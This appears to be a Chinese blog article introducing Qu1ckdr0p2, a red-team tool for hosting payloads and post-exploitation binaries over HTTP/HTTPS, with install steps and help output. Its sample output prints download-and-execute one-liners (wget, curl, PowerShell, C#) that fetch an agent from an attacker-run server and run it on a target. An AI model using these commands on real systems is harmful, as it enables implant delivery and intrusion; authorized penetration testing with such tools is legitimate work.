如何使用Qu1ckdr0p2快速通过HTTP或HTTPS实现文件托管

关于Qu1ckdr0p2

Qu1ckdr0p2是一款功能强大的文件托管工具,在该工具的帮助下,广大研究人员可以快速通过HTTP或HTTPS托管包括Payload和后渗透代码在内的任何文件。

Qu1ckdr0p2提供了别名和搜索功能,相关功能模块位于qu1ckdr0p2-tools库中。默认配置下,使用--https选项时该工具将生成一个自签名证书,,当Web服务器运行时,tun0接口会被优先使用,否则它将使用eth0接口。

common.ini文件中定义了--search和-u选项中需要使用的映射别名。

当网络服务器运行时,屏幕上会打印出几个下载地址,广大研究人员可以直接复制和粘贴使用。

工具安装

注意:当前版本的Qu1ckdr0p2仅支持通过pip工具进行安装,如果你直接将该项目源码克隆至本地的话,可能会出现一些意外问题。

首先,我们需要在本地设备上安装并配置好Python 3环境。接下来,直接使用pip3工具安装Qu1ckdr0p2:

复制代码
pip3 install qu1ckdr0p2

 

echo "alias serv='~/.local/bin/serv'" >> ~/.zshrc

source ~/.zshrc

或者:

复制代码
echo "alias serv='~/.local/bin/serv'" >> ~/.bashrc

source ~/.bashrc

 

serv init --update

工具使用

在当前工作目录下托管一个单独的文件:

复制代码
$ serv serve -f implant.bin --https 443
复制代码
$ serv serve -f file.example --http 8080

工具更新和帮助信息:

复制代码
$ serv --help            

Usage: serv [OPTIONS] COMMAND [ARGS]...

 

  Welcome to qu1ckdr0p2 entry point.

 

Options:

  --debug  启用调试模式

  --help   显示工具帮助信息和退出

 

Commands:

  init    执行更新

  serve  托管文件
复制代码
$ serv serve --help

Usage: serv serve [OPTIONS]

 

  Serve files.

 

Options:

  -l, --list            查看别名

  -s, --search TEXT   搜索别名

  -u, --use INTEGER  使用动态数字作为别名

  -f, --file FILE        托管一个文件

  --http INTEGER     使用HTTP+自定义端口

  --https INTEGER    使用HTTPS+自定义端口

  -h, --help          显示帮助信息和退出
复制代码
$ serv init --help       

Usage: serv init [OPTIONS]

 

  Perform updates.

 

Options:

  --update            检查并下载缺失的工具组件

  --update-self        使用pip更新工具

  --update-self-test    使用开发测试,将安装不稳定的工具组件

  --help               显示帮助信息和退出

工具更新命令:

复制代码
$ serv init --update
复制代码
$ serv init --update-self

从映射别名托管一个文件

-u选项要设置的映射别名数字是动态的,因此我们不需要记住指定的数字或输入工具名称:

复制代码
$ serv serve --search ligolo               

 

[→] Path: ~/.qu1ckdr0p2/windows/agent.exe

[→] Alias: ligolo_agent_win

[→] Use: 1

 

[→] Path: ~/.qu1ckdr0p2/windows/proxy.exe

[→] Alias: ligolo_proxy_win

[→] Use: 2

 

[→] Path: ~/.qu1ckdr0p2/linux/agent

[→] Alias: ligolo_agent_linux

[→] Use: 3

 

[→] Path: ~/.qu1ckdr0p2/linux/proxy

[→] Alias: ligolo_proxy_linux

[→] Use: 4

(...)
复制代码
$ serv serve --search ligolo -u 3 --http 80

 

[→] Serving: ../../.qu1ckdr0p2/linux/agent

[→] Protocol: http

[→] IP address: 192.168.1.5

[→] Port: 80

[→] Interface: eth0

[→] CTRL+C to quit

 

[→] URL: http://192.168.1.5:80/agent

 

[↓] csharp:

$webclient = New-Object System.Net.WebClient; $webclient.DownloadFile('http://192.168.1.5:80/agent', 'c:\windows\temp\agent'); Start-Process 'c:\windows\temp\agent'

 

[↓] wget:

wget http://192.168.1.5:80/agent -O /tmp/agent && chmod +x /tmp/agent && /tmp/agent

 

[↓] curl:

curl http://192.168.1.5:80/agent -o /tmp/agent && chmod +x /tmp/agent && /tmp/agent

 

[↓] powershell:

Invoke-WebRequest -Uri http://192.168.1.5:80/agent -OutFile c:\windows\temp\agent; Start-Process c:\windows\temp\agent

 

⠧ Web server running

工具运行截图

许可证协议

本项目的开发与发布遵循MIT开源许可证协议。

项目地址

Qu1ckdr0p2 :【GitHub传送门

参考资料

GitHub - byinarie/qu1ckdr0p2-tools: Red Team / Pentest tooling used in Qu1ckdr0p2

相关推荐
记得多喝水o31 分钟前
华三M-LAG场景下,部分MAC内的流量泛洪导致端口流量打满
网络
群联云防护小杜32 分钟前
服务器被攻击怎么办
运维·服务器·网络·网络协议·安全·web安全
华为云开发者联盟37 分钟前
混合云网络过于复杂?ENS给你全局一张网的极致体验
网络·ens·混合云·华为云stack
利哥AI实例探险42 分钟前
建筑工地AI安全检测系统:YOLO11数据标注训练与PyQt5界面设计应用开发
人工智能·qt·安全
安胜ANSCEN1 小时前
数据流动背后的“暗流涌动”,企业如何借助多源威胁检测响应高效捕捉安全威胁?
安全
__zhangheng1 小时前
Mac 查询IP配置,网络代理
linux·服务器·网络·git
IT 古月方源1 小时前
ospf 的 状态机详解
运维·网络·tcp/ip·智能路由器
dog2502 小时前
UDP 比 TCP 更快吗?
网络·tcp/ip·udp
一勺汤2 小时前
YOLO11改进-模块-引入星型运算Star Blocks
网络·yolo·目标检测·改进·魔改·yolov11·yolov11改进
ChennyWJS2 小时前
03.HTTPS的实现原理-HTTPS的工作流程
网络·网络协议·http·https